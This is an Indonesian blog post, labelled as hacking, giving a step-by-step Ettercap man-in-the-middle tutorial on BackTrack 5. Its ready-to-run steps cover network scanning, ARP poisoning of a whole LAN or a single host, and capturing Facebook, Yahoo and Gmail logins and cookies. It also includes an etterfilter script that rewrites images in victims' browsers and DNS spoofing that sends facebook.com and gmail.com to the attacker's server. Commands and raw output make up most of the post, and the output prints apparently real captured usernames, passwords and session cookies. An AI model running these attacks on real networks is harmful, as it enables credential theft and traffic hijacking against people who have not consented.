ettercap di backtrack 5
Label:
Hacking
Sebenarnya ini hanyalah update dari postingan saya sebelumnya
.. namun kali ini saya menggunakan Backtrack V dan agak melengkapi
fiture-fiture ettercap. Ettercap biasa di sebut sebagai Swiss Army
Knife, Ettercap sebenarnya merupakan tools yang sering di gunakan untuk
metode penyerangan MITM ( man on the middle attack ). Banyak varian
serangan pada MITM, sebut saja sniffing, spoofing, phissing, cookies
hijacking dan masih banyak lagi. Ok saya deskripsikan percobaan saya.
1. Attacker : backtrack V R1
Ip address :
Link encap:Ethernet HWaddr f4:ec:38:99:60:f3 inet addr:192.168.1.6 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::f6ec:38ff:fe99:60f3/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:29319 errors:0 dropped:0 overruns:0 frame:0 TX packets:30177 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:17469869 (17.4 MB) TX bytes:6132389 (6.1 MB)2. Target : windows xp ( terinstall pada virtualbox )
Ip address : 192.169.1.14
3. Gateway : 192.168.1.1 ( tp-link modem route )
4. Accesspoint : 192.168.1.50 ( 3com )
Ok lets begin..
Langkah pertama , biasanya attacker akan mengumpulkan target terlebih dahulu. Kali ini saya gunakan nmap
zee@eichel{~}:nmap -sn -n 192.168.1.1/24
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-01-06 14:29 WIT
Nmap scan report for 192.168.1.1
Host is up (0.0076s latency).
MAC Address: C8:64:C7:4B:B8:D0 (zte)
Nmap scan report for 192.168.1.6 ===> Attacker
Host is up.
Nmap scan report for 192.168.1.14 ===> Target
Host is up (0.0029s latency).
MAC Address: 08:00:27:45:C0:C0 (Cadmus Computer Systems)
Nmap scan report for 192.168.1.25
Host is up (0.0095s latency).
MAC Address: 1C:4B:D6:44:75:9D (AzureWave)
Nmap scan report for 192.168.1.50
Host is up (0.014s latency).
MAC Address: 00:1E:C1:4C:BF:F6 (3com Europe)
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.35 seconds
Kita coba melihat hasil man dari ettercap , perbiasakan baca.. dengan membaca kita jadi tahu secara detailETTERCAP(8) ETTERCAP(8) NAME ettercap NG-0.7.3 - A multipurpose sniffer/content filter for man in the middle attacks ***** IMPORTANT NOTE ****** Since ettercap NG (formerly 0.7.0), all the options have been changed. Even the target specification has been changed. Please read carefully this man page. SYNOPSIS ettercap [OPTIONS] [TARGET1] [TARGET2] TARGET is in the form MAC/IPs/PORTs where IPs and PORTs can be ranges (e.g. /192.168.0.1-30,40,50/20,22,25) DESCRIPTION Ettercap was born as a sniffer for switched LAN (and obviously even "hubbed" ones), but during the development process it has gained more and more features that have changed it to a powerful and flexible tool for man-in-the-middle attacks. It supports active and passive dissec‐ tion of many protocols (even ciphered ones) and includes many features for network and host analysis (such as OS fingerprint). dst...Now what ?
PREPARE :
Jika kita menginginkan serangan sang Swiss Army Knife ini berfungsi dengan baik pada koneksi jaringan aman ssl maka kita harus memastikan bahwa redir_command_on script pada etter.conf aktif. Secara default etter.conf di backtrack linux R1 berada pada direktori
/etc/etter.confUntuk mengaktifkan script tadi , buka file etter.conf dengan editor kesayangan anda kemudian uncomment baris di bawah ini.
# if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Dump traffic pada ARP ( sniffing – dump cookies https )
Command : ettercap -T -w dump -i wlan0 -M ARP /xxx.xxx.x.x/ //Keterangan :
1. Dump traffic dan sniffing 2. Syntax T = mode text w = menulis ke sebuah file , dalam contoh ini adalah "dump" i = Interface secara spesifik ( default = eth0 ) M = Tipe attack ( MITM )hasil output :
zee@eichel{~}:ettercap -T -w dump -i wlan0 -M ARP /192.168.1.1/ //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan0... (Ethernet)
wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0
Privileges dropped to UID 0 GID 0...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
5 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.1.1 C8:64:C7:4B:B8:D0
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Fri Jan 6 15:04:25 2012
TCP 69.171.224.11:443 --> 192.168.1.14:1116 | SA
HTTP : 69.171.224.11:443 -> USER: teconhackers@yahoo.com PASS: testes INFO: http://www.facebook.com/
Fri Jan 6 15:04:25 2012
TCP 192.168.1.14:1116 --> 69.171.224.11:443 | P
POST /login.php?login_attempt=1 HTTP/1.1.
Host: www.facebook.com.
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.
Accept-Language: id,en-us;q=0.7,en;q=0.3.
Accept-Encoding: gzip, deflate.
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7.
Connection: keep-alive.
Referer: http://www.facebook.com/.
Cookie: datr=-JSqTtD5bQG1_TZPO4s_w1F0; lu=RAxSgUQ56_3YJisKv_hVcK2w; lsd=5OOOR; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F;
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; wd=855x451; act=1325837039360%2F1%3A2; _e_qGyw_0=%5B%22qGyw%22%2C1325837031899%2C%22act%22%2C1325837031895%2C0%2C%22email%22%2C%22click%22%2C%22click%22
%2C%22-%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C648%2C37%2C0%2C838%2C16%5D; _e_qGyw_1=%5B%22qGyw%22%2C1325837039364%2C%22act%22%2C1325837039360%2C1%2C%22pass%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2
Fri Jan 6 15:04:25 2012
TCP 192.168.1.14:1116 --> 69.171.224.11:443 | P
C798%2C39%2C0%2C838%2C16%5D.
Content-Type: application/x-www-form-urlencoded.
Content-Length: 276.
.
charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%
2C%D0%84&lsd=5OOOR&locale=id_ID&email=teconhackers%40yahoo.com&pass=testes&
default_persistent=0&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C
%E6%B0%B4%2C%D0%94%2C%D0%84&lsd=5OOOR&timezone=-270
Fri Jan 6 15:04:31 2012
TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P
HTTP/1.1 200 OK.
Cache-Control: private, no-cache, no-store, must-revalidate.
Expires: Sat, 01 Jan 2000 00:00:00 GMT.
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p".
Pragma: no-cache.
X-Content-Type-Options: nosniff.
X-Frame-Options: DENY.
Set-Cookie: _e_qGyw_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly.
Set-Cookie: _e_qGyw_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly.
Set-Cookie: datr=-JSqTtD5bQG1_TZPO4s_w1F0; expires=Sun, 05-Jan-2014 08:04:30 GMT; path=/; domain=.facebook.com; httponly.
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Flogin_attempt%3D1; path=/; domain=.facebook.com.
Set-Cookie: sfiu=AYiQWdMg0NKJJtjnR5tVGVvbNWEMxoG_LiLa0edz4Cl1Dat4VE5lNttqg66Y1AHmjG6eSmP3y8c8Q3UlogKtkOItnAr5I2uMzVEZJEd1HSvnRpbJDnULxFRjPYmUQdI5e8H4LJ2OdkxMMsOvFBT6UeBM;
expires=Sun, 05-Feb-2012 08:04:30 GMT; path=/; domain=.facebook.com; httponly.
Set-Cookie: wd=deleted; expires=Thu, 01-Ja
Fri Jan 6 15:04:31 2012
TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P
n-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly.
Content-Encoding: gzip.
Content-Type: text/html; charset=utf-8.
X-FB-Server: 10.54.101.46.
X-Cnection: close.
Date: Fri, 06 Jan 2012 08:04:30 GMT.
Content-Length: 6549.
.
...........\[o.Hv~._..f..n......@.d[.l...n.. JdI.E.4/..k`.,. @.......$...$.......
8.6X......H...nOo;.d0.M....:u.....y^.o6..+.....go.?.I.NA64Y2...&*m.vW.T.x^A.l...Yg
J..7=..I...Q. .~;."K..7......
Fri Jan 6 15:04:31 2012
TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P
.,.7lK.V....Z.k..h......Y.^..K.7..,....../+V.....^...Go.Z.....?..]')..z`H&m..tI..
....3A..D|. D`.r.....9..LL...8Q...A
.N,M.&...6.;.
....0.p....tc.x ..c.....gob....w.-. 192.168.1.14:1116 | P
.....YL#...$...lm..+B.:.C...!.Q......n/H .T...".?.kF..>[%e..pH6!.!.`2H.......h.FZ
.m.>].|.Y.....3\......G........0.F..e..D......6...(...L.3l .1...|.2,h.Wa.H.*...U.
..6.......'l;..v..v6..=*.(..Fb..aF4.Z......H..,....'yC.....5t.6@u;!......2..+.GD.
...,..3:V..dzp.Q.{.......>.......a.F....L.F.5.v .]..z...86.2.......r....F1.&iB...
...lC.A...X}...m...?..w.5a..Z..P*........1(.....Z...P.=.K.
FW6z6F#.&A...g..c.-b....5#d...6%......V`
Fri Jan 6 15:04:32 2012
TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P
..4../.\.oJ...6TA...Da.2>.............ou..x...c.b.25z(...^.vYcO7.......pL.....NW4
e.v..Z...'..tNz=.......a@.. .. Up.7.".......8X.4)....%.E...YoB....3.+*..H"|..g.0f
.C.%.#h..bv....T...Y.[.;.6.......e_.L.X...Pm`j.h94.C_T...I..!@..4p.....Z.......y.
w......f...0...r.......-.i.^..c..o..sL.cz...SD.ZxB.q8..S......../...o|...........
7.....D..ar.....=t.D0aT...... '...}h...g.............].cb@.s.f......V?.M.!8....8.
.........a*..8:,...O.._........m.y.8.8...B9..p...*.3.w9.1..5..Lu.F.m...x.*.c.N...
.gp.....f7i..#....h.;....k..w..[3...T..r...D.t
..i0..X!...,o.^ 192.168.1.14:1116 | P
r.p..9=?.\...UMst...l............e.H.y..3.i..
.K.;b..T...Q..|..'H..?.....j{..AKj.-y......P...J....J.......y#..^.hnia=.[.....e..
e,...%.&..R.f....V..4..Ds..}..5(.....?(.f..=.........Z.T......;..\....3.%........n
...rn.}.T9X._...S.X].....;-..\6.'+..|w5.s.[......F.j.h.X).j..[j.~.H..Jo...@.\...O.
.\......=G...p3....ll.gr.F . 192.168.1.14:1116 | P
I...Q2..v.#.....:.4..wro.....Gh..&B. .C.../.FD...n.xG..!V`.ny..hN....?tD..2.;..h.
p........6.ob......^.T.R......=...M.ma.D.s..ui...T4.....D.}..:c............g@]..
vW.^X...^...."...h&. ..VZ.0.>.;...mB.....\._.c.........7.".a......_.s|dk.Vp..g.v.
.u>."....|.~..T.m..dl.....*.....Xk.....}.t.]..=.....f........#.`w.(5.{..U`.....z.
.....0C.....~...}../....}......O~.4....'.Y..U..6.&m..3c:.=.........?.M....'.....d.
3.........s..!.
'3.0g..Yv...Z.........\..M...._.....c.....5/......."....W..f.P..7..JC)W..:..a^J..
...3D..n.G....3 o..'?..Z6@h...p.R............
wtp.........-.f.....T.(.T.y.|.C......\.......;..+..X.H&.....W..V.q"...5.....%....
9....p.{v....fW}..L...d...G......&..q.)...H....=.C.|..#.v..Zxw.4...CX...$2..?+.h.
p6.kH.@
Fri Jan 6 15:04:33 2012
TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P
.G.j..C...4..p.sY*K..W.R..?..H..!o.D.G....=.Q..6...I:..%... ...)..."&f"}.%..uM...
..r.
.s..............X..
,.9^.u..fe..1.....G.....U].A..?...C../.J..~.... .......!..D...M$~Oq..OF.........-
.t.y.H...,...|....... .F..L.t!1..k`.y....`].>KC..`..%.0,DZ2x..Z...#.5.....D.D.C..
.2.y_..c.x2........[.3.U.....1Y. 192.168.1.14:1116 | P
k|&.......egL..Hd3.'s/...Y-...Xb.ic.....MR.~4.v#.......b...U6....E.L..7..6q....T.
1....@.....l"s..U...;e.H....*4.....nk...E\..8) $^ q.uqU~-.........E.{....*..|^...
Y..s^...A....9.g..^@....v=.~..^.j....e.N.7TG\d.Q.e".{../......4.7
s .o.6........P...z
........C..g.V.&mg...ZJ.....U....3|_I7a........F0bH...[..........B....+.......M..
CD..E.2.......T.hLY....{!.P........C}.............9...I... ...LaeD.j...^...m.....
....m.......S.5.Z.v..r....).Zm.tX:.......5......C.U..w;.buo.Y......|.x.(.0.......
....O...u..wLN*+sjnu~..,.k.]........A.k..l....s...B....4?.2.O%..I....x..c*..}..n.
jw.[..nd."........{X.....B"..*..r...3\...".^L.4.......9..j.C.[.....~v.TP.8.z..z.p
. 192.168.1.14:1116 | P
.{.."..Fn.fX..I|.......7..J....Z.4.*9t6P..j?O7...).O.:..P.|...ep......h.dg.0..NB?
.Qb.D...pM..|...(.....{q...(U......$..t..Y&;&(.ne.0..^..8f......#u.:f.N..-...#.;.
.....W...c..1.1.....@......9|....M..B.....t.c..Dx.0..=.. .k../c..6.....S..8.!...A
...V6...(4Qb....$...'fl..........2..$A.............3Q...A.c......(.$..(....%z....
....?$ R.6.i.......,.m.x..,2P.....\....z.|.=...'...c..R,.......;.....Y9'*7.#E.K..
.i
Fri Jan 6 15:04:33 2012
TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P
.~.4..f...P.[.......5(...f..YAN0...Rqs/Y9......C..mt....6
.......4.9,U.,..U....[*..3..
...q.'../.....8A==...XM....R.D.h*7._\._.[.K31....Ze.!$..9...g.T...........C.pe..
...*...G....'..t..c............]QIH.....I..&J.."[.....D}...!.I.........0.wT. V.
.&.....sH.....t..]W.!..a..!.;4.?.....s"..,.5 ..b..oiT.R.gE.....u....X(.U..x..._.
gT...._...hP....-.....l.....+... h.iu.(.'.......Y.. .](d......Rny%..!%m.6\.y..pQ
...
[.m.c*b%..E...D..Z....Kq|.d..i.#*.Y.\....[...9......eU..b.w\......A....`% .&O.K..
...$....t.iQ .@... 5...g.L..@.G.1.....QP9..|..q .)..O.dY...d._.._OT...G..
Fri Jan 6 15:04:33 2012
TCP 69.171.224.11:443 --> 192.168.1.14:1116 | R
Perhatikan hasil output yang saya tandai ..user name :
teconhackers@yahoo.com dan pass : testes , serta cookies yang telah di
dump.METODE SERANGAN ARP POISONING + SNIFFING ATTACK
1. Metode serangan secara menyeluruhYang saya maksudkan dengan metode serangan secara menyeluruh adalah serangan yang menuju kepada seluruh host di bawah satu router ( gateway ).
ettercap -T -q -M ARP // //Sangat tidak di sarankan jika target memiliki jaringan yang besar. Akan membuat komposisi komputer lambat. Mungkin dengan spec hardware yang tinggi kita memiliki kemampuan untuk melakukan metode serangan ini.
Spesifikasi syntax -q = quite mode ( verbose )Kombinasi syntax untuk serangan ke seluruh network
ettercap -T -q -M ARP // //Hasil output :
zee@eichel{~}:ettercap -T -q -i wlan0 -M ARP // //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan0... (Ethernet)
wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0
Privileges dropped to UID 0 GID 0...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
5 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
HTTP : 69.171.228.13:443 -> USER: teconhackers@yahoo.com PASS:
testers INFO: https://www.facebook.com/
HTTP : 66.163.169.186:443 -> USER: niceday PASS: 299281
INFO: https://login.yahoo.com/config/login_verify2?&.src=ym
2. Metode serangan terhadap satu spesifik IPJika jaringan terlalu besar ada baiknya kita menyerang target ip yang di tentukan. Serangan tersebut di mulai dengan syntax
ettercap -T -q -F ig.ef -M ARP /xxx.xxx.xxx.xxx/ //Sebagai contoh kita menyerang ip target 192.168.1.14
hasil output :
zee@eichel{~}:ettercap -T -q -i wlan0 -M ARP /192.168.1.14/ //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan0... (Ethernet)
wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0
Privileges dropped to UID 0 GID 0...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
4 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.1.14 08:00:27:45:C0:C0
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
HTTP : 72.14.203.84:443 -> USER: zee-eichel@gmail.com
PASS: uufjjeiisjau INFO:
https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/&scc=1<mpl=default<mplcache=2
Filter ( have fun with ettercap )
Heheh sekarang kita coba bermain-main dengan ettercap ini dengan menggunakan filter-filter tertentu. Kali ini kita coba filter yang di coding oleh irongeekBerikut ini scriptnya , copas kemudian simpan dengan nama ig.filter kemudian copile script tersebut dengan ettercap
############################################################################
# #
# Jolly Pwned -- ig.filter -- filter source file #
# #
# By Irongeek. based on code from ALoR & NaGA #
# Along with some help from Kev and jon.dmml #
# http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833 #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "http://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-snc7/310716_228831213842949_100001482164189_675549_1767862890_n.jpg\" ");
replace("IMG SRC=", "http://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-snc7/310716_228831213842949_100001482164189_675549_1767862890_n.jpg\" ");
msg("Filter Ran.\n");
}
Compiling : etterfilter [name].filter -o [output].ef
zee@eichel{~}:etterfilter ig.filter -o ig.ef
etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
Parsing source file 'ig.filter' done.
Unfolding the meta-tree done.
Converting labels to real offsets done.
Writing output to 'ig.ef' done.
-> Script encoded into 16 instructions.
Penjelasan pada script filter tadi sebenarnya hanya mengganti seluruh
gambar yang di buka pada browser korban dengan gambar yang di
kehendaki. Untuk menjalankan ettercap dengan script filter tertentu ,ettercap -T -q -F ig.ef -M ARP // //Jika muncul barisan
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Berarti proses ARP Poisoning sedang berjalan dan berbagai image akan di ganti dengan image yang ditentukan, sehingga tiap kali host target atau jaringan yang telah di racuni akan melihat setiap image yang telah di ganti tersebut pada setiap website yang di bukanya pada browser.
Spoofing Plugin
Spoofing adalah salah satu tehnik MITM yang mengalihkan traffik dari jalur sebenarnya menuju kepada alamat yang di tentukan. Intinya Attacker akan memaksa target menuju pada alamat yang ditentukan attacker menggantikan alamat sebenarnya yang dituju target.Ettercap memiliki plugin untuk melakukan jenis serangan MITM ini.
Lakukan nmap scanning seperti yang sudah saya contohkan di awal artikel ini. Setelah kita telah mendapatkan informasi network pastikan kita mengaktifkan ip forwarding pada mesin attacker.
Untuk mengaktifkan ip forwarding
Linux:
echo 1 > /proc/sys/net/ipv4/ip_forwardBSD:
sysctl -w net.inet.ip.forwarding=1Kemudian config jalur yang akan di spoof nantinya yang di konfigurasikan pada file etter.dns. Lokasi file etter.dns secara default pada backtrack V R1
/usr/local/share/ettercap/etter.dnsUncommand atau ganti baris ini dengan domain yang hendak di spoof ipnya.
facebook.com A 192.168.1.6 *.facebook.com A 192.168.1.6 www.facebook.com PTR 192.168.1.6 # Wildcards in PTR are not allowedEdit ip address dengan ip address pengganti , dalam hal ini saya menggunakan ip address yang di gunakan os backtrack yaitu 192.168.1.6, dan hasilnya akan mengarahkan domain facebook.com dan www.facebook.com ke ip address 192.168.1.6
Syntax ettercap dengan plugin dns_spoof
ettercap -T -q -i wlan0 -P dns_spoof -M ARP // //-P = plugin
saya coba spoof ke gmail.com dengan ip 192.168.1.6
Hasil Output :
Hasil ping pada target host
Perhatikan hasil ping pada host target, ternyata domain www.gmail.com telah di arahkan ( spoofed ) ke 192.168.1.6 Berhubung saya mengaktifkan apache web server ( localhost server ) maka ketika host target membuka gmail.com melalui browser , browser akan membuka halaman localweb saya yang terdapat pada alamat 192.168.1.6
Ok semoga postingan saya ini berguna .. artikel ini akan saya update selanjutnya , kali ini akan saya tambahkan cara menanggal serangan-serangan seperti ini.
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar